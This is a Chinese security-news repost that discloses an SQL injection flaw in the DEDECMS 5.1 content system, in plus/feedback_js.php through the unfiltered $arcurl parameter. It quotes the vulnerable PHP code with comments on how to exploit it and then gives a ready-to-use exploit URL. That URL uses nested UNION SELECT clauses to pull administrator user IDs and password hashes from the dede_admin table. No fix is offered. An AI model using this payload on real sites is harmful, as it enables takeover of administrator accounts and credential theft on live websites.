DEDECMS 5.1 feedback_js.php 0DAY

安全 漏洞
SQL注入##远程攻击##立即处理[msg]这个漏洞是我和Rainy'Fox一起发现的。同样是在magic_quotes_gpc=off的情况下可用漏洞版本:DEDECMS 5.1此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl...

这个漏洞是我和Rainy'Fox一起发现的

同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此处$arcurl没有过滤
if(is_array($row)) $urlindex = $row['id'];
//存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID为空或$urlindex为空则退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......

看一下利用方法吧,嘿,为了闭合我用了两次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

【编辑推荐】

  1. 重新审视企业IPS的应用:防御SQL注入攻击的利剑
  2. SQL注入攻击及其防范检测技术研究
  3. 安全技巧:学会检查SQL注入式攻击漏洞
责任编辑:安泉 来源: 鬼仔's Blog
相关推荐

2009-07-06 13:15:07

2015-05-20 16:34:14

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻击

2011-08-26 11:44:01

2011-10-24 16:26:06

2022-03-25 13:41:55

漏洞网络攻击Quantum(量子

2013-05-24 14:02:42

2021-07-14 17:17:45

0day漏洞恶意代码

2020-12-17 10:28:27

漏洞网络攻击网络安全

2010-01-20 16:13:15

2009-09-09 08:54:50

2011-02-28 09:34:55

2011-03-15 15:14:22

2010-09-01 15:18:04

2009-03-11 15:10:36

2015-08-31 10:09:34

2022-03-30 09:09:39

漏洞网络安全网络攻击

2023-01-12 12:00:33

2009-07-15 16:29:03

点赞
收藏

51CTO技术栈公众号